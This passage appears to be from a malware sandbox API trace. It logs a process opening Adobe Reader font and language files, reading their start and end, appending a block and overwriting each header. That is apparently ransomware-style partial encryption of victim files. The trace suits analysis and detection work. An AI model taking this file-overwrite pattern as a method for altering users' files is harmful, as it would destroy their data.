lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0097.699] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0097.699] CloseHandle (hObject=0x1ec) returned 1 [0097.699] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.700] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.700] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x90dc [0097.700] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.700] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.700] ReleaseMutex (hMutex=0x168) returned 1 [0097.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-BoldOblique.otf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-BoldOblique.otf", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CourierStd-BoldOblique.otf", lpUsedDefaultChar=0x0) returned 26 [0097.700] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0097.704] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x80dc [0097.704] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.705] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x80dc [0097.705] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.705] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0097.706] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0097.706] CloseHandle (hObject=0x1ec) returned 1 [0097.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1879c [0097.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.707] ReleaseMutex (hMutex=0x168) returned 1 [0097.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-BoldIt.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-BoldIt.otf", cchWideChar=20, lpMultiByteStr=0x1f88a64, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MyriadPro-BoldIt.otf", lpUsedDefaultChar=0x0) returned 20 [0097.707] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0097.709] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1779c [0097.709] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.710] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1779c [0097.710] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.711] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0097.711] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0097.711] CloseHandle (hObject=0x1ec) returned 1 [0097.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.712] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.712] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x178a2 [0097.712] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.712] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.712] ReleaseMutex (hMutex=0x168) returned 1 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZY______.PFB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZY______.PFB", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZY______.PFB", lpUsedDefaultChar=0x0) returned 12 [0097.713] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0097.717] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x168a2 [0097.717] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.719] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x168a2 [0097.719] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.719] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0097.719] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0097.720] CloseHandle (hObject=0x1ec) returned 1 [0097.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.063] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.063] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6c96 [0098.064] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.064] ReleaseMutex (hMutex=0x168) returned 1 [0098.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_JO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_JO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_JO.txt", lpUsedDefaultChar=0x0) returned 30 [0098.064] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.066] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c96 [0098.066] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.068] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c96 [0098.068] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.076] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.076] WriteFile (in: hFile=0x1e4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.076] CloseHandle (hObject=0x1e4) returned 1 [0098.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.077] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.077] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6c96 [0098.077] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.078] ReleaseMutex (hMutex=0x168) returned 1 [0098.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SD.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SD.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_SD.txt", lpUsedDefaultChar=0x0) returned 30 [0098.078] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.080] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c96 [0098.080] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.081] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c96 [0098.081] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.082] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.082] WriteFile (in: hFile=0x1e4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.082] CloseHandle (hObject=0x1e4) returned 1 [0098.082] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.083] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.084] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6cdc [0098.084] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.084] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.084] ReleaseMutex (hMutex=0x168) returned 1 [0098.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca_ES_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0098.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca_ES_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ca_ES_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0098.084] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.086] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5cdc [0098.086] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.087] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5cdc [0098.087] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.088] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.088] WriteFile (in: hFile=0x1e4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.088] CloseHandle (hObject=0x1e4) returned 1 [0098.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.089] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.089] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6e92 [0098.089] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.089] ReleaseMutex (hMutex=0x168) returned 1 [0098.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.el.txt", lpUsedDefaultChar=0x0) returned 27 [0098.090] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.092] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e92 [0098.092] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.093] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5e92 [0098.093] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.093] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0098.094] WriteFile (in: hFile=0x1e4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.094] CloseHandle (hObject=0x1e4) returned 1 [0098.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0098.095] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.095] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6ec4 [0098.095] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0098.095] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.095] ReleaseMutex (hMutex=0x168) returned 1 [0098.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 